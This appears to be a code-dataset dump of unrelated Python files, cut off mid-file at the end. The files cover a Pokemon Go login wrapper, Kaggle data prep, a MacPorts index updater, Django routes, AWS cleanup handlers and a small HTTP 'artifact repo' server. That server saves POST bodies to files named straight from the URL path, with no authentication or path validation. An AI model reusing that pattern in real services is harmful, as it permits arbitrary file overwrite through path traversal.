id stringlengths 1 7 | text stringlengths 6 1.03M | dataset_id stringclasses 1
value |
|---|---|---|
1788982 | <filename>pogo/pogoBot/pogoAPI/api.py
from .custom_exceptions import GeneralPogoException
from .location import Location
from .pgoapi import pgoapi
from .session import PogoSession
from .util import get_encryption_lib_path
# Callbacks and Constants
API_URL = 'https://pgorelease.nianticlabs.com/plfe/rpc'
LOGIN_URL = 'https://sso.pokemon.com/sso/login?service=https%3A%2F%2Fsso.pokemon.com%2Fsso%2Foauth2.0%2FcallbackAuthorize'
LOGIN_OAUTH = 'https://sso.pokemon.com/sso/oauth2.0/accessToken'
PTC_CLIENT_SECRET = '<KEY>'
ANDROID_ID = '9774d56d682e549c'
SERVICE = 'audience:server:client_id:848232511240-7so421jotr2609rmqakceuu1luuq0ptb.apps.googleusercontent.com'
APP = 'com.nianticlabs.pokemongo'
CLIENT_SIG = '321187995bc7cdc2b5fc91b11a96e2baa8602c62'
class PokeAuthSession():
    """Holds credentials and API state and creates authenticated PogoSessions
    via either a Google or a PTC (Pokemon Trainer Club) login."""

    def __init__(self, username, password, provider, logger, config, geo_key=None):
        # Google Maps API keys always start with 'AIza'; fail fast on typos.
        if geo_key and not geo_key.startswith('AIza'):
            raise GeneralPogoException("Google Maps key is invalid. Must start with 'AIza'")
        self.geo_key = geo_key
        self.logger = logger
        self.config = config
        self.provider = provider
        self.api = pgoapi.PGoApi(config)
        self.api.activate_signature(get_encryption_lib_path())
        self.api.set_logger(logger)
        self.session = self.api.get_session()
        # User credentials
        self.username = username
        self.password = password

    def setLocation(self, locationLookup, pogo_session=None):
        """Resolve the session location and push it to the API.

        Prefers the location of an existing `pogo_session` (re-auth case),
        otherwise geocodes `locationLookup`. Raises GeneralPogoException
        when neither yields a location.
        """
        location = None
        if pogo_session:
            location = pogo_session.location
        elif locationLookup:
            location = Location(locationLookup, self.geo_key, self.api)
            self.logger.info(location)
        if location:
            self.api.set_position(*location.getCoordinates())
            return location
        raise GeneralPogoException('Location not found')

    def createPogoSession(self, location, provider=None, pogo_session=None):
        """Build a PogoSession for `location`.

        `provider` overrides the instance-level provider when given.
        (Bug fix: the explicit `provider` argument was previously ignored
        and `self.provider` was always used.)
        """
        getter = pogo_session.getter if pogo_session else None
        return PogoSession(
            self.session,
            provider or self.provider,
            location,
            self.logger,
            self.api,
            self.config,
            getter=getter
        )

    def createGoogleSession(self, locationLookup='', pogo_session=None):
        """Log in via Google and return a new PogoSession."""
        self.logger.info('Creating Google session for %s', self.username)
        location = self.setLocation(locationLookup, pogo_session)
        log = self.api.login('google', self.username, self.password, app_simulation=False)
        if not log:
            raise GeneralPogoException("Google login failed. Double check your login info.")
        return self.createPogoSession(
            location,
            provider='google',
            pogo_session=pogo_session
        )

    def createPTCSession(self, locationLookup='', pogo_session=None):
        """Log in via the Pokemon Trainer Club and return a new PogoSession."""
        self.logger.info('Creating PTC session for %s', self.username)
        location = self.setLocation(locationLookup, pogo_session)
        log = self.api.login('ptc', self.username, self.password, app_simulation=False)
        if not log:
            # Bug fix: this error previously claimed "Google login failed".
            raise GeneralPogoException("PTC login failed. Double check your login info.")
        return self.createPogoSession(
            location,
            provider='ptc',
            pogo_session=pogo_session
        )

    def authenticate(self, locationLookup):
        """We already have all information, authenticate"""
        return {
            "google": self.createGoogleSession,
            "ptc": self.createPTCSession
        }[self.provider](locationLookup=locationLookup)

    def reauthenticate(self, pogo_session):
        """Replace the HTTP session and re-login, reusing the old session's state."""
        if self.session:
            self.session = self.api.make_new_session()
        return {
            "google": self.createGoogleSession,
            "ptc": self.createPTCSession
        }[self.provider](pogo_session=pogo_session)
| StarcoderdataPython |
104226 | # Create dummy variables for categorical features with less than 5 unique values
import pandas as pd
from sklearn.preprocessing import LabelEncoder
import gc
import datetime
import calendar
import xgboost as xgb
# import logger.py
from logger import logger
# set iteration (suffix used in all output file names for this run)
iteration = '3'
logger.info('Start data_prep_full' + iteration + '.py')
# read in data
train = pd.read_table('train.csv', sep=',')
test = pd.read_table('test.csv', sep=',')
# train = pd.read_table('train_sample.csv', sep=',')
# Row-index ranges are kept so the combined frame can be split back later.
train_idx = range(0, train.shape[0])
logger.info('Train data read, dimensions: %d x %d' % (train.shape[0], train.shape[1]))
# test = pd.read_table('test_sample.csv', sep=',')
test_idx = range(train.shape[0], train.shape[0] + test.shape[0])
logger.info('Test data read, dimensions: %d x %d' % (test.shape[0], test.shape[1]))
# create target series
target = train['target']
# append train and test for data prep
# NOTE(review): DataFrame.append was removed in pandas 2.x — confirm the
# pinned pandas version, or switch to pd.concat([train, test]).
df = train.append(test)
logger.info('Train and Test appended, dimensions: %d x %d' % (df.shape[0], df.shape[1]))
# combine train and test for label encoding and preprocessing
gc.collect()
# remove duplicates
# load colummns to remove from csv file
cols_to_rm = list(pd.read_csv('cols_to_rm.csv'))
# add ID col to columns to remove
cols_to_rm += ['ID']
# add the following cols that are duplicative
cols_to_rm += ['VAR_0044']
cols_to_rm += ['target']
# remove duplicate columns and ID
df.drop(labels=cols_to_rm, axis=1, inplace=True)  # disable for now
logger.info('Redundant columns removed, dimensions: %d x %d' % (df.shape[0], df.shape[1]))
# remove garbage
gc.collect()
# Clean up dates
# Initialize list of datetime columns (parsed and expanded by format_dates below)
date_cols = ['VAR_0073', 'VAR_0075',
             'VAR_0156', 'VAR_0157', 'VAR_0158', 'VAR_0159',
             'VAR_0166', 'VAR_0167', 'VAR_0168', 'VAR_0169',
             'VAR_0176', 'VAR_0177', 'VAR_0178', 'VAR_0179', 'VAR_0204']
# function to get week of month
def week_of_month(date):
    """Return the 1-based week-of-month index of `date`, or None for nulls.

    Week 1 begins on the first day d of the month with d.day > d.weekday()
    (i.e. the first day that starts a full Monday-based week); earlier days
    yield 0.
    """
    if pd.isnull(date):
        return None
    month_length = calendar.mdays[int(date.month)]
    start = None
    for day in range(1, month_length):
        candidate = datetime.datetime(date.year, date.month, day)
        if candidate.day > candidate.weekday():
            start = candidate
            break
    # Whole weeks elapsed since the anchor day, shifted to start at 1.
    return (date - start).days // 7 + 1
def format_dates(df):
    """Parse each column in the module-level `date_cols` list in place and
    derive calendar features (year, month, quarter, day, day-of-year,
    week-of-year, day-of-week, week-of-month) as new columns.

    Expects raw values like '02JAN12:00:00:00' (format '%d%b%y:%H:%M:%S').
    """
    for col in date_cols:
        year_col = col + '_yr'
        month_col = col + '_mth'
        quart_col = col + '_q'
        day_col = col + '_day'
        doy_col = col + '_doy'
        woy_col = col + '_woy'
        dow_col = col + '_dow'
        wom_col = col + '_wom'
        df[col] = pd.to_datetime(df[col], format='%d%b%y:%H:%M:%S')
        df[year_col] = df[col].dt.year
        df[month_col] = df[col].dt.month
        df[day_col] = df[col].dt.day
        df[quart_col] = df[col].dt.quarter
        df[doy_col] = df[col].dt.dayofyear
        # NOTE(review): Series.dt.weekofyear is removed in recent pandas;
        # confirm the pinned version or use dt.isocalendar().week.
        df[woy_col] = df[col].dt.weekofyear
        df[dow_col] = df[col].dt.dayofweek+1  # +1 so monday = 1
        df[wom_col] = df[col].apply(week_of_month)+1  # +1 so wom starts from 1
# run format dates (adds the derived calendar columns in place)
format_dates(df)
# get hour of day for VAR_0204 (the only column carrying a meaningful time part)
df['VAR_0204_hr'] = df['VAR_0204'].dt.hour+1  # +1 first hour = 1
logger.info('Dates formatted')
# save date_cols created for future identification
date_cols_full = []
for date in date_cols:
    date_cols_full += [date+'_yr'] + [date+'_mth'] + [date+'_q'] + [date+'_day'] + [date+'_doy'] \
        + [date+'_woy'] + [date+'_dow'] + [date+'_wom']
date_cols_full += ['VAR_0204_hr']
date_cols_full = pd.DataFrame(date_cols_full, columns=['date_cols'])
date_cols_full.to_csv('date_cols_full.csv', index=False)
logger.info('date_cols_full.csv saved')
# initialize label encoder (shared by col_cleanup; refit per column)
le = LabelEncoder()
# define function to encode categorical columns via apply
def col_cleanup(col):
    """Label-encode object (string) columns with the shared module-level
    encoder `le`; for every other dtype fill missing values with -1."""
    if col.dtype.name != 'object':
        return col.fillna(-1)
    le.fit(col)
    return le.transform(col).astype(int)
# apply col_cleanup to all columns (label-encode strings, fillna(-1) elsewhere)
df = df.apply(col_cleanup)
logger.info('Columns encoded')
gc.collect()
# convert datetime cols to integer difference from first date in that col
# this comes after col_cleanup as we need to convert NaT date values to -1 first
def date_to_int(df):
    """Replace each column in `date_cols` (in place) with its whole-day
    offset from that column's minimum date, as an int."""
    for col in date_cols:
        df[col] = (df[col] - df[col].min()).astype('timedelta64[D]').astype(int)
# convert dates to integers
date_to_int(df)
gc.collect()
# CREATE DUMMY VARIABLES FOR CATEGORICAL COLUMNS
# Treat any column with at most 5 unique values as categorical.
cat_columns = []
# NOTE(review): DataFrame.iteritems is removed in pandas 2.x (use .items()).
for col, values in df.iteritems():
    if len(values.unique()) <= 5:
        cat_columns.append(col)
cat_columns_11 = ['VAR_0283', 'VAR_0305', 'VAR_0325', 'VAR_0342']
# 404 and 493 contain occupations, don't use for now as too many unique values
# 200, 237, and 274 contain location variables, don't use for now as too many unique values
# cat_columns_11 = ['VAR_0200', 'VAR_0237', 'VAR_0274', 'VAR_0283', 'VAR_0305', 'VAR_0325',
#                   'VAR_0342', 'VAR_0404', 'VAR_0493']
cat_columns += cat_columns_11
cat_columns.remove('VAR_0204')  # remove this date column
# create df of cat_columns
df_cat = df[cat_columns]
logger.info('Dataframe of categorical features created, dimensions: %d x %d' % (df_cat.shape[0], df_cat.shape[1]))
# convert column types to object so get_dummies one-hot encodes them all
df_cat = df_cat.astype('object')
# create dummy columns
df_cat = pd.get_dummies(df_cat)
logger.info('Dataframe of dummy variables created, dimensions: %d x %d' % (df_cat.shape[0], df_cat.shape[1]))
# get list df of numeric columns only
df = df.drop(cat_columns, axis=1)
logger.info('Dataframe of categorical features created, dimensions: %d x %d' % (df.shape[0], df.shape[1]))
# concatenate df of numeric features and df of dummy features
df = pd.concat([df, df_cat], axis=1)
logger.info('Concatenated df of numerics and df of dummy variables; dimensions: %d x %d' % (df.shape[0], df.shape[1]))
# split back into train and test set using the row ranges saved at load time
train = df.iloc[train_idx, :]
train = pd.concat([train, target], axis=1)
test = df.iloc[test_idx, :]
# SAVE PROCESSED CSV
# save train_proc_full
logger.info('Saving train_proc_full%s.csv: %d rows x %d col' % (iteration, train.shape[0], train.shape[1]))
train.to_csv('train_proc_full' + iteration + '.csv', index=False)  # to save full vars
logger.info('train_proc_full' + iteration + '.csv saved')  # to save full vars
# remove target from train
train.drop(['target'], axis=1, inplace=True)
logger.info('target dropped from train: %d rows x %d col' % (train.shape[0], train.shape[1]))
# save test_proc_full
logger.info('Saving test_proc_full%s.csv: %d rows x %d col' % (iteration, test.shape[0], test.shape[1]))
test.to_csv('test_proc_full' + iteration + '.csv', index=False)  # to save full vars
logger.info('test_proc_full' + iteration + '.csv saved')  # to save full vars
# CREATE XGB MATRIX
logger.info('Start create_xgb_matrix.py')
# train = pd.read_csv('train_proc_full' + iteration + '.csv')
# logger.info('train_proc_full' + iteration + '.csv read')
# logger.info('Dimensions of train with target: %d x %d' % (train.shape[0], train.shape[1]))
#
# # create target series
# target = train['target']
#
# # drop target col from train
# train.drop('target', axis=1, inplace=True)
# logger.info('Dimensions of train: %d x %d' % (train.shape[0], train.shape[1]))
gc.collect()
# create xgb matrix
train_xgb = xgb.DMatrix(data=train, label=target)
logger.info('train xgbDMatrix created')
train_xgb.save_binary('train_proc_full' + iteration + '.buffer')
logger.info('train_proc_full' + iteration + '.buffer saved')
# create xgb matrix
test_xgb = xgb.DMatrix(data=test)
# NOTE(review): the log message below says "train" but this is the test matrix.
logger.info('train xgbDMatrix created')
test_xgb.save_binary('test_proc_full' + iteration + '.buffer')
logger.info('test_proc_full' + iteration + '.buffer saved')
| StarcoderdataPython |
1665579 | <gh_stars>10-100
import os
import subprocess
import sys
import io
import shutil
import json
import django
from port.models import LastPortIndexUpdate
import config
from settings import BASE_DIR
# Make the project root importable and point Django at its settings module.
sys.path.append(BASE_DIR)
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'
# Redundant after the direct assignment above, but harmless.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "settings")
# NOTE(review): port.models is imported above, before django.setup() runs;
# Django normally requires setup/configured settings before model imports —
# confirm this works in the deployment environment.
django.setup()
def rebuild_repo(directory, url, name):
    """Delete `directory` if it exists, then clone `url` into DATA_DIR as `name`."""
    # remove the existing repo directory, if available
    if os.path.isdir(directory):
        # Bug fix: this previously called shutil.rmtree(url), i.e. tried to
        # delete the remote URL string instead of the checked directory.
        shutil.rmtree(directory)
    # cd into the data directory
    os.chdir(config.DATA_DIR)
    # clone the repo
    subprocess.run([config.GIT, 'clone', '--quiet', url, name])
def refresh_portindex_json():
    """Update the contrib and ports git checkouts, regenerate the PortIndex
    and its JSON form, and return the ports repo's new HEAD commit hash.

    Raises KeyError if the commit recorded inside the generated JSON does
    not match the repo HEAD (i.e. the index is stale/inconsistent).
    """
    # check if the contrib repo is available
    if not os.path.isdir(config.MACPORTS_CONTRIB_DIR):
        rebuild_repo(config.MACPORTS_CONTRIB_DIR, config.MACPORTS_CONTRIB_URL, config.MACPORTS_CONTRIB)
    # cd into the contrib repo
    os.chdir(config.MACPORTS_CONTRIB_DIR)
    # update the contrib repo
    subprocess.call([config.GIT, 'pull', '--quiet'])
    # go back
    os.chdir("..")
    # check if the ports repo is available
    if not os.path.isdir(config.MACPORTS_PORTS_DIR):
        rebuild_repo(config.MACPORTS_PORTS_DIR, config.MACPORTS_PORTS_URL, config.MACPORTS_PORTS)
    # cd into ports directory
    os.chdir(config.MACPORTS_PORTS_DIR)
    # update the ports repo
    subprocess.call([config.GIT, 'pull', '--quiet'])
    latest_commit = subprocess.run([config.GIT, 'rev-parse', 'HEAD'], stdout=subprocess.PIPE).stdout.decode('utf-8')
    # update/generate the portindex
    subprocess.run(['portindex', '-p', 'macosx_19_i386', '-x'])
    # update/generate portindex.json, embedding the commit hash for verification
    portindexjson = subprocess.run([config.TCLSH, config.PORTINDEX2JSON, config.LOCAL_PORTINDEX, '--info', 'commit={}'.format(latest_commit)], stdout=subprocess.PIPE).stdout.decode('utf-8')
    portindexjson = json.loads(portindexjson)
    with open(config.LOCAL_PORTINDEX_JSON, 'w') as file:
        json.dump(portindexjson, file)
    # match the latest commit from the repo and the portindex.json match
    if latest_commit != portindexjson.get('info', {}).get('commit'):
        # if they don't match, we should abort the operation
        raise KeyError
    return latest_commit
def get_old_commit():
    """Return the last indexed git commit hash from the database, or None
    if no update has been recorded yet."""
    record = LastPortIndexUpdate.objects.all().first()
    return record.git_commit_hash if record is not None else None
def get_updated_portdirs():
    """Refresh the port index and return the set of port directories
    ("category/port", lower-cased) touched between the previously recorded
    commit and the new HEAD."""
    # update portindex.json and get new commit
    new_commit = refresh_portindex_json()
    old_commit = get_old_commit()
    # cd into the ports repository
    os.chdir(config.MACPORTS_PORTS_DIR)
    # generate the range of commits to find updated paths
    # (old^..new so the old commit's own changes are included)
    range_commits = str(old_commit).strip() + "^.." + str(new_commit).strip()
    changed_paths = subprocess.run([config.GIT, 'diff', '--name-only', range_commits], stdout=subprocess.PIPE).stdout.decode('utf-8')
    s = io.StringIO(changed_paths)
    updated_ports_dir = set()
    # loop over all the paths and find portdirs to update
    for line in s:
        sections = line.split('/')
        if len(sections) < 2:
            # ignore updates in the root directory
            continue
        portdir = sections[0].lower() + '/' + sections[1].lower()
        updated_ports_dir.add(portdir)
    os.chdir(BASE_DIR)
    return updated_ports_dir
def get_portindex_json():
    """Load the locally generated portindex JSON file.

    Returns the parsed object, or None when the file is missing or does
    not contain valid JSON.
    """
    if not os.path.isfile(config.LOCAL_PORTINDEX_JSON):
        return None
    with open(config.LOCAL_PORTINDEX_JSON, "r", encoding='utf-8') as fp:
        try:
            return json.load(fp)
        except json.decoder.JSONDecodeError:
            return None
| StarcoderdataPython |
4803335 | <reponame>sfstpala/v6wos
import unittest.mock
import tornado.testing
import v6wos.tests
import v6wos.model.hosts
class HostsTest(v6wos.tests.TestCase):
    """Unit tests for v6wos.model.hosts.Hosts with the CouchDB layer mocked.

    Each test patches couch.AsyncCouch methods (and, where needed, the
    model's own put/delete) and drives the coroutine under test with
    tornado's gen_test runner.
    """

    @unittest.mock.patch("couch.AsyncCouch.view")
    @unittest.mock.patch("v6wos.model.hosts.Hosts.put")
    @unittest.mock.patch("v6wos.model.hosts.Hosts.delete")
    @tornado.testing.gen_test
    def test_get(self, delete, put, view):
        # get() should return one record per name in all_hosts, in order:
        # known hosts come from the view, missing ones are fetched via put(),
        # and stale view rows are cleaned up via delete().
        delete.return_value = v6wos.tests.future()
        put.return_value = v6wos.tests.future({
            "aaaa": [
                "fc00:e968:6179::de52:7100",
            ],
            "name": "facebook.com",
        })
        view.return_value = v6wos.tests.future({
            "rows": [
                {
                    "value": {
                        "host": {
                            "aaaa": [],
                            "name": "example.invalid",
                        },
                        "type": "host",
                    },
                },
                {
                    "value": {
                        "host": {
                            "aaaa": [
                                "fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b",
                            ],
                            "name": "google.com",
                        },
                        "type": "host",
                    },
                },
            ],
        })
        model = v6wos.model.hosts.Hosts(self.application)
        model.all_hosts = ["google.com", "facebook.com"]
        res = yield model.get()
        self.assertEqual(res, [
            {
                "aaaa": [
                    "fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b",
                ],
                "name": "google.com",
            },
            {
                "aaaa": [
                    "fc00:e968:6179::de52:7100",
                ],
                "name": "facebook.com",
            },
        ])

    @unittest.mock.patch("couch.AsyncCouch.view")
    @unittest.mock.patch("couch.AsyncCouch.save_doc")
    @unittest.mock.patch("v6wos.util.lookup.check_aaaa")
    @unittest.mock.patch("v6wos.util.lookup.check_glue")
    @tornado.testing.gen_test
    def test_put(self, check_glue, check_aaaa, save_doc, view):
        # put() should run the DNS lookups, merge the results into the
        # existing document (preserving _id/_rev) and save it back.
        check_aaaa.return_value = [
            "fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b",
        ]
        check_glue.return_value = []
        save_doc.return_value = v6wos.tests.future()
        view.return_value = v6wos.tests.future({
            "rows": [
                {
                    "value": {
                        "_id": "100",
                        "_rev": "100-1",
                        "host": {
                            "aaaa": [],
                            "glue": [],
                            "name": "google.com",
                        },
                        "type": "host",
                    },
                },
            ],
        })
        model = v6wos.model.hosts.Hosts(self.application)
        res = yield model.put("google.com")
        self.assertEqual(res, {
            "aaaa": [
                "fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b",
            ],
            "glue": [],
            "name": "google.com",
        })
        save_doc.assert_called_once_with({
            "_id": "100",
            "_rev": "100-1",
            "host": {
                "aaaa": [
                    "fd00:a516:7c1b:17cd:6d81:2137:bd2a:2c5b",
                ],
                "glue": [],
                "name": "google.com",
            },
            "type": "host",
        })

    @unittest.mock.patch("couch.AsyncCouch.view")
    @unittest.mock.patch("couch.AsyncCouch.delete_docs")
    @tornado.testing.gen_test
    def test_delete(self, delete_docs, view):
        # delete() should remove every stored document for the given host.
        delete_docs.return_value = v6wos.tests.future()
        view.return_value = v6wos.tests.future({
            "rows": [
                {
                    "value": {
                        "_id": "200",
                        "_rev": "200-1",
                        "host": {
                            "aaaa": [],
                            "name": "example.invalid",
                        },
                        "type": "host",
                    },
                },
            ],
        })
        model = v6wos.model.hosts.Hosts(self.application)
        yield model.delete("example.invalid")
        delete_docs.assert_called_once_with([{
            "_id": "200",
            "_rev": "200-1",
            "host": {
                "aaaa": [],
                "name": "example.invalid",
            },
            "type": "host",
        }])
| StarcoderdataPython |
113200 | <reponame>BaDTaG/tacticalrmm
from django.urls import path
from . import views
from apiv3 import views as v3_views
# URL routes for the agent API; most endpoints are served by the apiv3 views,
# while the check-runner endpoints use this app's own views.
urlpatterns = [
    path("newagent/", v3_views.NewAgent.as_view()),
    path("meshexe/", v3_views.MeshExe.as_view()),
    path("saltminion/", v3_views.SaltMinion.as_view()),
    path("<str:agentid>/saltminion/", v3_views.SaltMinion.as_view()),
    path("sysinfo/", v3_views.SysInfo.as_view()),
    path("hello/", v3_views.Hello.as_view()),
    path("checkrunner/", views.CheckRunner.as_view()),
    path("<str:agentid>/checkrunner/", views.CheckRunner.as_view()),
]
| StarcoderdataPython |
1764745 | # coding=utf-8
from OTLMOW.OTLModel.Datatypes.KeuzelijstField import KeuzelijstField
from OTLMOW.OTLModel.Datatypes.KeuzelijstWaarde import KeuzelijstWaarde
# Generated with OTLEnumerationCreator. To modify: extend, do not edit
class KlSeinbrugType(KeuzelijstField):
    """Types van seinbrug."""
    # Metadata identifying this choice list within the OTL model.
    naam = 'KlSeinbrugType'
    label = 'Seinbrug type'
    objectUri = 'https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#KlSeinbrugType'
    definition = 'Types van seinbrug.'
    codelist = 'https://wegenenverkeer.data.vlaanderen.be/id/conceptscheme/KlSeinbrugType'
    # Allowed values, keyed by their fill-in value.
    options = {
        'enkeleLigger': KeuzelijstWaarde(invulwaarde='enkeleLigger',
                                         label='enkeleLigger',
                                         objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlSeinbrugType/enkeleLigger'),
        'koker': KeuzelijstWaarde(invulwaarde='koker',
                                  label='koker',
                                  objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlSeinbrugType/koker'),
        'nietDoorlopendeBuis': KeuzelijstWaarde(invulwaarde='nietDoorlopendeBuis',
                                                label='nietDoorlopendeBuis',
                                                objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlSeinbrugType/nietDoorlopendeBuis'),
        'vakwerk': KeuzelijstWaarde(invulwaarde='vakwerk',
                                    label='vakwerk',
                                    objectUri='https://wegenenverkeer.data.vlaanderen.be/id/concept/KlSeinbrugType/vakwerk')
    }
| StarcoderdataPython |
1775277 | <reponame>Mikma03/InfoShareacademy_Python_Courses<filename>Part_2_intermediate/mod_6/lesson_3/ex_1_simple_except/example_4.py
def run_example():
try:
print("Przed rzuceniem wyjątku")
raise TypeError("Coś poszło nie tak...")
print("To się nie wydarzy")
except Exception as error:
print(f"Jeżeli wyjątek jest klasą potomną to też się złapie: {error}")
print("I program będzie przetwarzany dalej :)")
if __name__ == '__main__':
run_example()
| StarcoderdataPython |
179689 | # Monocyte - Monocyte - Search and Destroy unwanted AWS Resources relentlessly.
# Copyright 2015 Immobilien Scout GmbH
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import warnings
import logging
import boto3
class Resource(object):
    """Value object describing a single cloud resource under review.

    Wraps the provider-specific object together with its type, id,
    creation date, region and the reason it was flagged.
    """

    def __init__(self, resource, resource_type, resource_id, creation_date,
                 region=None, reason=None):
        self.wrapped = resource
        self.region = region
        self.resource_type = resource_type
        self.resource_id = resource_id
        self.creation_date = creation_date
        self.reason = reason

    def __eq__(self, other):
        # Equal only to instances of the exact same class with identical attributes.
        return type(other) is type(self) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not self.__eq__(other)

    def __str__(self):
        template = ("{class_name}({resource}, {resource_type}, {resource_id}, "
                    "{creation_date}, region={region}, reason={reason})")
        return template.format(
            class_name=self.__class__.__name__,
            resource=self.wrapped,
            resource_type=self.resource_type,
            resource_id=self.resource_id,
            creation_date=self.creation_date,
            region=self.region,
            reason=self.reason)

    def __repr__(self):
        return str(self)
# Common module prefix stripped from handler class paths for display names.
HANDLER_PREFIX = "monocyte.handler."


class Handler(object):
    """Base class for per-service resource handlers.

    Subclasses implement region discovery, detection of unwanted resources,
    string rendering and deletion.
    """

    def __init__(self, region_filter, dry_run=True, logger=None, ignored_resources=None, whitelist=None):
        # Promote warnings to errors process-wide so problems surface early.
        warnings.filterwarnings('error')
        self.region_filter = region_filter
        # Keep only the regions accepted by the supplied filter predicate.
        self.region_names = [region_name for region_name in self.fetch_region_names() if self.region_filter(region_name)]
        self.dry_run = dry_run
        self.ignored_resources = ignored_resources or []
        self.whitelist = whitelist or {}
        self.logger = logger or logging.getLogger(__name__)

    @property
    def resource_type(self):
        # "module.Class" with the common handler prefix stripped.
        full_type = "%s.%s" % (self.__class__.__module__, self.__class__.__name__)
        return full_type.replace(HANDLER_PREFIX, "")

    @property
    def name(self):
        # Same derivation as resource_type, kept as a separate property.
        full_name = "%s.%s" % (self.__class__.__module__, self.__class__.__name__)
        return full_name.replace(HANDLER_PREFIX, "")

    def get_account_id(self):
        """Return the AWS account id for the current credentials (via STS)."""
        return boto3.client('sts').get_caller_identity().get('Account')

    def get_whitelist(self):
        """Return the whitelist section for the current account ({} if absent)."""
        return self.whitelist.get(self.get_account_id(), {})

    def fetch_region_names(self):
        raise NotImplementedError("Should have implemented this")

    def fetch_unwanted_resources(self):
        raise NotImplementedError("Should have implemented this")

    def to_string(self, resource):
        raise NotImplementedError("Should have implemented this")

    def delete(self, resource):
        raise NotImplementedError("Should have implemented this")
| StarcoderdataPython |
def cholesky(A):
    """Factor square matrix A (list of lists) into B * C, where B is
    lower-triangular and C is upper-triangular with a unit diagonal
    (a Crout-style LU decomposition, despite the function's name)."""
    rows = len(A)
    cols = len(A[0])
    B = [[0] * cols for _ in range(rows)]
    C = [[0] * cols for _ in range(rows)]
    # Seed the first column of B, the first row of C, and C's unit diagonal.
    for i in range(rows):
        B[i][0] = A[i][0]
        C[0][i] = A[0][i] / B[0][0]
        C[i][i] = 1
    # Fill the remaining entries: lower part into B, strict upper part into C.
    for i in range(rows):
        for j in range(cols):
            if i >= j:
                B[i][j] = A[i][j] - sum(B[i][k] * C[k][j] for k in range(j))
            else:
                C[i][j] = (A[i][j] - sum(B[i][k] * C[k][j] for k in range(i))) / B[i][i]
    return B, C
def solve_cholesky(S, B, C):
    """Solve B * C * X = S, with B lower-triangular and C unit-diagonal
    upper-triangular (as produced by cholesky()).

    Forward substitution solves B Y = S, then back substitution solves
    C X = Y. Generalized: the system size is taken from len(S) instead of
    the previous hard-coded 3x3 limit (backward compatible for 3x3 input).
    """
    n = len(S)
    X = [0] * n
    Y = [0] * n
    # Forward substitution: unsolved entries of Y are still 0, so summing
    # over the full range only picks up the already-solved prefix.
    for i in range(n):
        Y[i] = (S[i] - sum(B[i][k] * Y[k] for k in range(n))) / B[i][i]
    # Back substitution, from the last unknown upwards.
    for i in range(n - 1, -1, -1):
        X[i] = (Y[i] - sum(C[i][k] * X[k] for k in range(n))) / C[i][i]
    return X
1630434 | <reponame>kkcookies99/UAST<filename>Dataset/Leetcode/valid/66/208.py<gh_stars>0
class Solution(object):
    def XXX(self, digits):
        """Increment (in place) the non-negative integer whose decimal
        digits are stored most-significant-first in `digits`.

        :type digits: List[int]
        :rtype: List[int]
        """
        digits[-1] += 1
        pos = len(digits) - 1
        # Propagate the carry leftwards while a digit overflows to 10.
        while digits[pos] == 10:
            digits[pos] = 0
            if pos == 0:
                # Carry past the most significant digit: grow the number.
                digits.insert(0, 1)
            else:
                pos -= 1
                digits[pos] += 1
        return digits
| StarcoderdataPython |
# NOTE: Python 2 syntax (print statements) — a "Learn Python the Hard Way"
# style exercise about strings, %-formatting and repetition.
print "Mary had a little lamb."  # plain string literal
print "Its fleece was white as %s." % 'snow'  # %s substitutes 'snow' into the template
print "And everywhere that Mary went."
print "." * 10  # string repetition: prints ten dots
# One character per variable, together spelling "CheeseBurger".
end1 = "C"
end2 = "h"
end3 = "e"
end4 = "e"
end5 = "s"
end6 = "e"
end7 = "B"
end8 = "u"
end9 = "r"
end10 = "g"
end11 = "e"
end12 = "r"
# watch that comma at the end. try removing it to see what happens
# (in Python 2 a trailing comma suppresses the newline, so both halves
# print on one line: "Cheese Burger")
print end1 + end2 + end3 + end4 + end5 + end6,
print end7 + end8 + end9 + end10 + end11 + end12
3365944 | from django.contrib import admin
from oscar.apps.shipping.models import (
OrderAndItemCharges, WeightBand, WeightBased)
class OrderChargesAdmin(admin.ModelAdmin):
    """Admin list view for per-order/per-item shipping charges."""
    list_display = ('name', 'description', 'price_per_order', 'price_per_item',
                    'free_shipping_threshold')


class WeightBandAdmin(admin.ModelAdmin):
    """Admin list view for weight-band shipping charges."""
    list_display = ('method', 'weight_from', 'weight_to', 'charge')


# Register the shipping models with the Django admin site.
admin.site.register(OrderAndItemCharges, OrderChargesAdmin)
admin.site.register(WeightBased)
admin.site.register(WeightBand, WeightBandAdmin)
| StarcoderdataPython |
29855 | <gh_stars>1-10
from http.server import HTTPServer, SimpleHTTPRequestHandler
class RepoRequestHandler(SimpleHTTPRequestHandler):
    """Tiny artifact repository: a POST to /name stores the request body
    as a local file called `name` and answers with a plain-text confirmation."""

    def _set_headers(self):
        # 200 OK with a plain-text body.
        self.send_response(200)
        self.send_header("Content-type", "text/plain")
        self.end_headers()

    def _encode(self, text):
        return text.encode('utf8')

    def do_POST(self):
        # Read exactly Content-Length bytes of the request body.
        length = int(self.headers['Content-Length'])
        payload = self.rfile.read(length)
        # Strip the leading slash to get the target file name.
        file_name = self.path[1:]
        with open(file_name, "w+b") as out:
            out.write(payload)
        self._set_headers()
        self.wfile.write(self._encode(f'{file_name} stored'))
# Listen address for the artifact repository server.
host = 'localhost'
port = 8080
print(f'simple artifact repo running on {host}:{port}')
# Serve until interrupted (Ctrl-C).
httpd = HTTPServer((host, port), RepoRequestHandler)
httpd.serve_forever()
| StarcoderdataPython |
4808324 | """Implements the method used for deciding which feature goes to which level
when plotting."""
import itertools
import math
class Graph:
    """Minimal undirected graph.

    Parameters
    ----------
    nodes
